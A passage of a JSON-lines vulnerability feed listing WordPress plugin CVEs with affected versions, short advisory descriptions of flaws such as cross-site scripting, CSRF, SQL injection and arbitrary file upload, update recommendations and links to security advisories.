5%40pdf-invoicing-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194265%40pdf-invoicing-for-woocommerce&new=3194265%40pdf-invoicing-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f01ecce1-cff1-41a6-ae90-3ace8b2e3a36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f01ecce1-cff1-41a6-ae90-3ace8b2e3a36?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12412","slug":"booking-and-rental-manager-for-woocommerce","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Rental and Booking Manager for Bike, Car, Dress, Resort with WooCommerce Integration \u2013 WpRently | WordPress plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018active_tab\u2019 parameter in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-and-rental-manager-for-woocommerce\\\/trunk\\\/templates\\\/template_segment\\\/resort_info.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-and-rental-manager-for-woocommerce\\\/trunk\\\/templates\\\/template_segment\\\/resort_info.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0cde64f-2533-46e0-9268-b9d100fb0a82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0cde64f-2533-46e0-9268-b9d100fb0a82?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1136","slug":"responsive-coming-soon","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Coming Soon Page & Maintenance Mode plugin for WordPress is vulnerable to unauthorized access of data due to an improperly implemented URL check in the wpsm_coming_soon_redirect function in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to view a site with maintenance mode or coming-soon mode enabled to view the site's content.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3c52d6e-b3f4-4ba8-aee4-b9f11704e1de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3c52d6e-b3f4-4ba8-aee4-b9f11704e1de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-coming-soon\\\/trunk\\\/redirect.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-coming-soon\\\/trunk\\\/redirect.php#L11\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28665","slug":"woo-bulk-price-update","versionEndExcluding":"2.2.2","description":"The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9765","slug":"ekc-tournament-manager","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The EKC Tournament Manager WordPress plugin before 2.2.2 allows a logged in admin to download system files outside of the WordPress directory","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c86157b0-43f3-4e82-9697-7dd9401b48d6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c86157b0-43f3-4e82-9697-7dd9401b48d6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9711","slug":"ekc-tournament-manager","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The EKC Tournament Manager WordPress plugin before 2.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/daee95c5-006e-4a83-b92a-7faa3e89d985\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/daee95c5-006e-4a83-b92a-7faa3e89d985\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9709","slug":"ekc-tournament-manager","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The EKC Tournament Manager WordPress plugin before 2.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9d535434-6512-44cb-8198-c105062df2b8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9d535434-6512-44cb-8198-c105062df2b8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0592","slug":"related-posts-for-wp","versionEndExcluding":"2.2.2","description":"The Related Posts for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the handle_create_link() function. This makes it possible for unauthenticated attackers to add related posts to other posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This ultimately makes it possible for attackers to view draft and password protected posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/related-posts-for-wp\\\/trunk\\\/classes\\\/hooks\\\/class-hook-link-related-screen.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/related-posts-for-wp\\\/trunk\\\/classes\\\/hooks\\\/class-hook-link-related-screen.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3049719\\\/related-posts-for-wp\\\/tags\\\/2.2.2\\\/classes\\\/hooks\\\/class-hook-link-related-screen.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3049719\\\/related-posts-for-wp\\\/tags\\\/2.2.2\\\/classes\\\/hooks\\\/class-hook-link-related-screen.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7500","slug":"ocean-social-sharing","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Ocean Social Sharing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via social icon titles in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L176\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L84\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3331993%40ocean-social-sharing&new=3331993%40ocean-social-sharing&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3331993%40ocean-social-sharing&new=3331993%40ocean-social-sharing&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7683e708-b7cb-444e-9069-f33e4ef3ac76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7683e708-b7cb-444e-9069-f33e4ef3ac76?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0379","slug":"custom-twitter-feeds","versionEndExcluding":"2.2.2","description":"The Custom Twitter Feeds \u2013 A Tweets Widget or X Feed Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the ctf_auto_save_tokens function. This makes it possible for unauthenticated attackers to update the site's twitter API token and secret via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-30498","slug":"codeflavors-vimeo-video-post-lite","versionEndExcluding":"2.2.2","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in CodeFlavors Vimeotheque: Vimeo WordPress Plugin <=\u00a02.2.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/codeflavors-vimeo-video-post-lite\\\/wordpress-vimeotheque-plugin-2-2-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/codeflavors-vimeo-video-post-lite\\\/wordpress-vimeotheque-plugin-2-2-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2178","slug":"aajoda-testimonials","versionEndExcluding":"2.2.2","description":"The Aajoda Testimonials WordPress plugin before 2.2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e84b71f9-4208-4efb-90e8-1c778e7d2ebb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e84b71f9-4208-4efb-90e8-1c778e7d2ebb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7341","slug":"ht-contactform","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the temp_file_delete() function in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Ajax.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Ajax.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FAjax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32da04ba-bee3-4fd3-b91b-57e588d5f4e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32da04ba-bee3-4fd3-b91b-57e588d5f4e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7340","slug":"ht-contactform","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the temp_file_upload function in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FServices%2FFileManager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FServices%2FFileManager.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0cb666b-bfab-492f-a74e-11dc9b171136?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0cb666b-bfab-492f-a74e-11dc9b171136?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5772","slug":"debug-log-manager","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Debug Log Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the clear_log() function. This makes it possible for unauthenticated attackers to clear the debug log via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e539549-1125-4b0e-aa3c-c8844041c23a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e539549-1125-4b0e-aa3c-c8844041c23a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-log-manager\\\/tags\\\/2.2.0\\\/classes\\\/class-debug-log.php#L822\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-log-manager\\\/tags\\\/2.2.0\\\/classes\\\/class-debug-log.php#L822\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-log-manager\\\/tags\\\/2.2.2\\\/classes\\\/class-debug-log.php#L828\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-log-manager\\\/tags\\\/2.2.2\\\/classes\\\/class-debug-log.php#L828\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1601","slug":"user-access-manager","versionEndExcluding":"2.2.18","description":"The User Access Manager WordPress plugin before 2.2.18 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible for attackers to access restricted content in certain situations.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6d3408c-2ceb-4a89-822b-13f5272a5fce\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6d3408c-2ceb-4a89-822b-13f5272a5fce\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6910","slug":"eventon-lite","versionImpact":"2.2.16","versionEndExcluding":"2.2.17","description":"The EventON WordPress plugin before 2.2.17 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 2.2.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/468373c6-7e47-489a-92c1-75025c543fd5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/468373c6-7e47-489a-92c1-75025c543fd5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10028","slug":"everest-backup","versionImpact":"2.2.13","versionEndExcluding":"2.2.14","description":"The Everest Backup \u2013 WordPress Cloud Backup, Migration, Restore & Cloning Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.13 via the exposed process stats file during the backup process. This makes it possible for unauthenticated attackers to obtain an archive file name and download the site's backup.","recommendation":"Update to version 2.2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b871957-a2b3-492f-b461-7040d9098b2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b871957-a2b3-492f-b461-7040d9098b2b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/everest-backup\\\/tags\\\/2.2.13\\\/inc\\\/classes\\\/class-backup-directory.php#L514\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/everest-backup\\\/tags\\\/2.2.13\\\/inc\\\/classes\\\/class-backup-directory.php#L514\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6850","slug":"carousel-slider","versionImpact":"2.2.13","versionEndExcluding":"2.2.14","description":"The Carousel Slider WordPress plugin before 2.2.4 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 2.2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c06995cb-1685-4751-811f-aead52a597a7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c06995cb-1685-4751-811f-aead52a597a7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6020","slug":"sign-up-sheets","versionImpact":"2.2.12","versionEndExcluding":"2.2.13","description":"The Sign-up Sheets WordPress plugin before 2.2.13 does not escape some generated URLs, as well as the $_SERVER['REQUEST_URI'] parameter before outputting them back in attributes, which could lead to Reflected Cross-Site Scripting.","recommendation":"Update to version 2.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3526320-3abd-4ddb-8f73-778741bd9c48\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3526320-3abd-4ddb-8f73-778741bd9c48\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6064","slug":"payhere-payment-gateway","versionImpact":"2.2.11","versionEndExcluding":"2.2.12","description":"The PayHere Payment Gateway WordPress plugin before 2.2.12 automatically creates publicly-accessible log files containing sensitive information when transactions occur.","recommendation":"Update to version 2.2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/423c8881-628b-4380-9677-65b3f5165efe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/423c8881-628b-4380-9677-65b3f5165efe\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9438","slug":"seur","versionImpact":"2.2.11","versionEndExcluding":"2.2.12","description":"The SEUR Oficial plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'change_service' parameter in all versions up to, and including, 2.2.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88edf229-2be2-49d0-b500-e8ff7708f806?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88edf229-2be2-49d0-b500-e8ff7708f806?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seur\\\/trunk\\\/core\\\/pages\\\/seur-get-labels.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seur\\\/trunk\\\/core\\\/pages\\\/seur-get-labels.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176965\\\/seur\\\/trunk\\\/core\\\/pages\\\/seur-get-labels.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176965\\\/seur\\\/trunk\\\/core\\\/pages\\\/seur-get-labels.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4372","slug":"carousel-slider","versionImpact":"2.2.10","versionEndExcluding":"2.2.11","description":"The Carousel Slider WordPress plugin before 2.2.11 does not sanitise and escape some parameters, which could allow users with a role as low as editor to perform Cross-Site Scripting attacks","recommendation":"Update to version 2.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13dcfd8a-e378-44b4-af6f-940bc41539a4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13dcfd8a-e378-44b4-af6f-940bc41539a4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13483","slug":"ltl-freight-quotes-saia-edition","versionImpact":"2.2.10","versionEndExcluding":"2.2.11","description":"The LTL Freight Quotes \u2013 SAIA Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 2.2.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242171%40ltl-freight-quotes-saia-edition&new=3242171%40ltl-freight-quotes-saia-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242171%40ltl-freight-quotes-saia-edition&new=3242171%40ltl-freight-quotes-saia-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5e0d192-17ee-42bd-9368-c8449d8e0d08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5e0d192-17ee-42bd-9368-c8449d8e0d08?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1177","slug":"wp-club-manager","versionImpact":"2.2.10","versionEndExcluding":"2.2.11","description":"The WP Club Manager \u2013 WordPress Sports Club Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings_save() function in all versions up to, and including, 2.2.10. This makes it possible for unauthenticated attackers to update the permalink structure for the clubs","recommendation":"Update to version 2.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64c2c8c2-58f5-4b7d-b226-39ba39e887d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64c2c8c2-58f5-4b7d-b226-39ba39e887d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030843%40wp-club-manager&new=3030843%40wp-club-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030843%40wp-club-manager&new=3030843%40wp-club-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3703","slug":"carousel-slider","versionImpact":"2.2.9","versionEndExcluding":"2.2.10","description":"The Carousel Slider WordPress plugin before 2.2.10 does not validate and escape some of its Slide options before outputting them back in the page\/post where the related Slide shortcode is embed, which could allow users with the Editor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 2.2.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3242b820-1da0-41ba-9f35-7be5dbc6d4b0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3242b820-1da0-41ba-9f35-7be5dbc6d4b0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4265","slug":"postmatic","versionEndExcluding":"2.2.10","description":"The Replyable WordPress plugin before 2.2.10 does not validate the class name submitted by the request when instantiating an object in the prompt_dismiss_notice action and also lacks CSRF check in the related action. This could allow any authenticated users, such as subscriber to perform Object Injection attacks. The attack could also be done via a CSRF vector against any authenticated user","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/095cba08-7edd-41fb-9776-da151c0885dd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/095cba08-7edd-41fb-9776-da151c0885dd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
